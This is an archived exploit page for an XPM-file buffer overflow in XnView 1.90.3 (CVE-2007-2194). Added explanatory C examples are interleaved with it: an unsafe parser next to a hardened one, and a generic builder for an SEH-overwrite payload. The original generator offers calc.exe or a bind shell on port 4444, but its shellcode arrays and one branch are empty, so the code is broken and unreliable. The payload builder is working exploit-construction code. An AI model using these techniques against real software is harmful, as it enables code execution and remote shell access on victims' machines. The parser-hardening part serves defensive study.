XnView 1.90.3 - '.xpm' Local Buffer Overflow

Related Vulnerabilities: CVE-2007-2194  
Publish Date: 22 Apr 2007
Author: Marsu

*                                                                            *
*                  XnView 1.90.3 .XPM File Buffer Overflow                   *
*                                                                            *
*                                                                            *
* XnView is vulnerable to a buffer overflow while processing a crafted XPM   *
* file. It does not check the length of the strings in the file's defined    *
* array before copying them into a fixed-size stack buffer, so an overlong   *
* entry overwrites the return address and the SEH chain, which leads to      *
* code execution.                                                            *
* This exploit runs calc.exe or binds a shell to port 4444.                  *
*                                                                            *
* Tested against Win XP SP2 FR.                                              *
* Have Fun!                                                                  *
*                                                                            *
* Coded and discovered by Marsu <Marsupilamipowa@hotmail.fr>                 *
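The bug class the advisory describes, as an added illustration that is not XnView's code and not part of the original post: a minimal XPM colour-table parser written in the unsafe style (a colour code copied into a fixed-size field with no length check) next to a hardened version that bounds every copy with the chars-per-pixel count from the values line. The field sizes (XPM_CODE_MAX, XPM_VALUE_MAX), the inputs (benign_xpm, hostile_entry) and all function names are constructed for this example.

```c
/* Added example: illustrative XPM colour-table parsing, not XnView's code.
 * XPM_CODE_MAX / XPM_VALUE_MAX are assumed field sizes for this demo. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define XPM_MAX_COLOURS 256
#define XPM_CODE_MAX    8   /* assumed: largest colour code the parser stores */
#define XPM_VALUE_MAX   32  /* assumed: "#RRGGBB" or a short symbolic name */

struct xpm_colour { char code[XPM_CODE_MAX]; char value[XPM_VALUE_MAX]; };
struct xpm_header { unsigned width, height, ncolours, cpp; };

/* Unsafe pattern: the colour code is copied up to the first blank with no
 * bound, so a code longer than XPM_CODE_MAX-1 bytes writes past c->code
 * (the bug class described above). Never feed this untrusted input. */
int parse_colour_unsafe(const char *entry, struct xpm_colour *c)
{
    const char *sp = strchr(entry, ' ');
    if (sp == NULL) return -1;
    size_t n = (size_t)(sp - entry);
    memcpy(c->code, entry, n);        /* n is never compared with sizeof c->code */
    c->code[n] = '\0';
    return sscanf(sp + 1, "c %31s", c->value) == 1 ? 0 : -1;
}

/* Values line "width height ncolours chars_per_pixel": every number is
 * range-checked before it is used to size or index anything. */
int parse_values(const char *line, struct xpm_header *h)
{
    if (sscanf(line, "%u %u %u %u", &h->width, &h->height, &h->ncolours, &h->cpp) != 4)
        return -1;
    if (h->width == 0 || h->height == 0 || h->width > 65535 || h->height > 65535)
        return -1;
    if (h->ncolours == 0 || h->ncolours > XPM_MAX_COLOURS)
        return -1;
    if (h->cpp == 0 || h->cpp >= XPM_CODE_MAX)   /* code plus NUL must fit */
        return -1;
    return 0;
}

/* Hardened: a colour code is exactly cpp bytes by definition, so its length
 * is known before the copy; the value is length-checked as well. */
int parse_colour_safe(const char *entry, unsigned cpp, struct xpm_colour *c)
{
    if (cpp == 0 || cpp >= XPM_CODE_MAX) return -1;
    if (strlen(entry) < cpp + 4) return -1;     /* "<code> c <value>" at minimum */
    if (entry[cpp] != ' ') return -1;           /* code longer than declared */
    memcpy(c->code, entry, cpp);
    c->code[cpp] = '\0';
    const char *rest = entry + cpp + 1;
    if (rest[0] != 'c' || rest[1] != ' ') return -1;   /* only the "c" key handled here */
    rest += 2;
    size_t vlen = strlen(rest);
    if (vlen == 0 || vlen >= XPM_VALUE_MAX) return -1;
    memcpy(c->value, rest, vlen + 1);
    return 0;
}

/* Parses the values line and colour table of an XPM string array. Returns the
 * number of colours read, or -1 on any malformed or overlong entry. */
int parse_xpm_colour_table(const char **lines, size_t nlines,
                           struct xpm_header *h, struct xpm_colour *table)
{
    if (nlines < 1 || parse_values(lines[0], h) != 0) return -1;
    if (nlines < 1 + (size_t)h->ncolours) return -1;
    for (unsigned i = 0; i < h->ncolours; i++)
        if (parse_colour_safe(lines[1 + i], h->cpp, &table[i]) != 0) return -1;
    return (int)h->ncolours;
}

/* Constructed inputs for this example (not from the original page). */
static const char *benign_xpm[] = { "2 2 2 1", "a c #FF0000", ". c None", "a.", ".a" };
static char hostile_entry[600];   /* 512-byte colour code against a declared cpp of 1 */

int benign_colour_count(void)
{
    struct xpm_header h; struct xpm_colour t[XPM_MAX_COLOURS];
    return parse_xpm_colour_table(benign_xpm, 5, &h, t);
}

int hostile_result(void)
{
    memset(hostile_entry, 'A', 512);
    strcpy(hostile_entry + 512, " c #00FF00");
    const char *hostile_xpm[] = { "2 2 1 1", hostile_entry, "aa", "aa" };
    struct xpm_header h; struct xpm_colour t[XPM_MAX_COLOURS];
    return parse_xpm_colour_table(hostile_xpm, 4, &h, t);
}

int main(void)
{
    printf("benign file: %d colours parsed\n", benign_colour_count());        /* 2 */
    printf("hostile file: %d (rejected before any copy)\n", hostile_result()); /* -1 */
    return 0;
}
```

The hardened parser never trusts the length of what it finds in the file: the colour code length comes from the values line (itself range-checked), the value is measured before it is copied, and the colour count is checked against both the table size and the number of lines present.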

#include <stdio.h>
#include <stdlib.h>

/* win32_exec -  EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char CalcShellcode[] =

/* win32_bind -  EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char BindShellcode[] =

char XPMHeaders[]=

int main(int argc, char* argv[])
{
	FILE* xpmfile;
	char evilbuff[6600];
	int offset=0;

	printf("[+] XnView 1.90.3 .XPM File Buffer Overflow\n");
	printf("[+] Coded and discovered by Marsu <Marsupilamipowa@hotmail.fr>\n");
	if (argc!=3) {
		printf("[+] Usage: %s Mode <file.xpm>\n",argv[0]);
		printf("[+] Mode is 0 -> run calc.exe\n");
		printf("[+]         1 -> bind shell to port 4444\n");
		return 0;
	}
	//Ret address depends on the way you open the document
	//jmp over EIP + pop pop ret in ??? to defeat SEH protection + jmp back to our shellcode
	//there are 3 ret addresses because files can be accessed in multiple ways
	if (!atoi(argv[1]))

	//End of file
	if ((xpmfile=fopen(argv[2],"wb"))==0) {
		printf("[-] Unable to access file.\n");
		return 0;
	}
	fwrite( evilbuff, 1, 6600, xpmfile );
	fclose(xpmfile);
	printf("[+] Done. Have fun!\n");
	return 0;
}
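The layout the comments in the generator describe (a short jump over the overwritten handler pointer, a pop/pop/ret in the handler slot, and a jump back to shellcode placed earlier in the file), as an added example that is not Marsu's code. It builds the record generically and decodes both jumps so the offsets can be verified without running anything. The header string, the seh_off distance, the ppr_addr gadget address and the int3 bytes standing in for shellcode are placeholders for this demo, not XnView values.

```c
/* Added example, not Marsu's code: a generic builder for the SEH-overwrite
 * layout described above. Offsets, the pop/pop/ret address and the
 * "shellcode" are placeholders for this demo, not XnView values. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

struct seh_layout {
    size_t   header_len;  /* bytes of valid file header before the overflowing field */
    size_t   seh_off;     /* distance from the field start to the nSEH slot (assumed) */
    uint32_t ppr_addr;    /* address of a pop/pop/ret gadget (placeholder) */
    size_t   total;       /* total file size to emit */
};

static void put_le32(unsigned char *p, uint32_t v)
{
    p[0] = (unsigned char)v;         p[1] = (unsigned char)(v >> 8);
    p[2] = (unsigned char)(v >> 16); p[3] = (unsigned char)(v >> 24);
}

static uint32_t get_le32(const unsigned char *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* rel32 operand for an E9 jump at from_off that must land at to_off. */
int32_t rel32_from_to(size_t from_off, size_t to_off)
{
    return (int32_t)((int64_t)to_off - (int64_t)(from_off + 5));
}

/* Layout in file offsets (assumed contiguous on the stack once parsed):
 *   [header][shellcode][filler][nSEH: EB 06 90 90][SEH: ppr][E9 back][filler]
 * The short jump in nSEH skips the 4-byte handler pointer; pop/pop/ret lands
 * on the E9, which jumps back to the shellcode placed before the record. */
int build_seh_payload(unsigned char *out, const struct seh_layout *lay,
                      const char *header, const unsigned char *sc, size_t sc_len)
{
    size_t sc_off   = lay->header_len;
    size_t nseh_off = lay->header_len + lay->seh_off;
    size_t seh_off  = nseh_off + 4;
    size_t jmp_off  = seh_off + 4;
    if (strlen(header) != lay->header_len) return -1;
    if (lay->total < jmp_off + 5) return -1;       /* record and jump must fit */
    if (sc_off + sc_len > nseh_off) return -1;     /* shellcode must end before nSEH */
    memset(out, 0x41, lay->total);                 /* 'A' filler: easy to spot in a crash */
    memcpy(out, header, lay->header_len);
    memcpy(out + sc_off, sc, sc_len);
    out[nseh_off] = 0xEB; out[nseh_off + 1] = 0x06;      /* jmp short +6 */
    out[nseh_off + 2] = 0x90; out[nseh_off + 3] = 0x90;  /* nop nop */
    put_le32(out + seh_off, lay->ppr_addr);
    out[jmp_off] = 0xE9;
    put_le32(out + jmp_off + 1, (uint32_t)rel32_from_to(jmp_off, sc_off));
    return 0;
}

/* Decoders so the layout can be checked without executing it. */
size_t short_jmp_landing(const unsigned char *buf, size_t off)
{
    return off + 2 + (size_t)(int8_t)buf[off + 1];
}
size_t near_jmp_landing(const unsigned char *buf, size_t off)
{
    return (size_t)((int64_t)off + 5 + (int32_t)get_le32(buf + off + 1));
}

/* Constructed demo values: a minimal XPM preamble, int3 bytes standing in
 * for shellcode, and a made-up gadget address. */
#define DEMO_TOTAL 1024
static const char demo_header[] = "/* XPM */\nstatic char *x[] = {\n\"";
static const unsigned char demo_sc[] = { 0xCC, 0xCC, 0xCC, 0xCC };
static unsigned char demo_buf[DEMO_TOTAL];
static struct seh_layout demo_layout;

int build_demo(void)
{
    demo_layout.header_len = sizeof demo_header - 1;
    demo_layout.seh_off    = 600;          /* assumed offset to the SEH record */
    demo_layout.ppr_addr   = 0x41424344;   /* placeholder, not a real gadget */
    demo_layout.total      = DEMO_TOTAL;
    return build_seh_payload(demo_buf, &demo_layout, demo_header, demo_sc, sizeof demo_sc);
}

size_t demo_nseh_off(void) { return demo_layout.header_len + demo_layout.seh_off; }

int main(void)
{
    if (build_demo() != 0) return 1;
    size_t n = demo_nseh_off();
    printf("nSEH @%zu -> %zu, E9 @%zu -> %zu (shellcode @%zu)\n", n,
           short_jmp_landing(demo_buf, n), n + 8, near_jmp_landing(demo_buf, n + 8),
           demo_layout.header_len);
    return 0;
}
```

In a real run the offset to the SEH record and the gadget address come from the debugger (the crash offset and a pop/pop/ret found in a module without SafeSEH), and, as the generator's comments note, the offset can differ with how the file is opened, which is why that code carries more than one return address.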

// milw0rm.com [2007-04-22]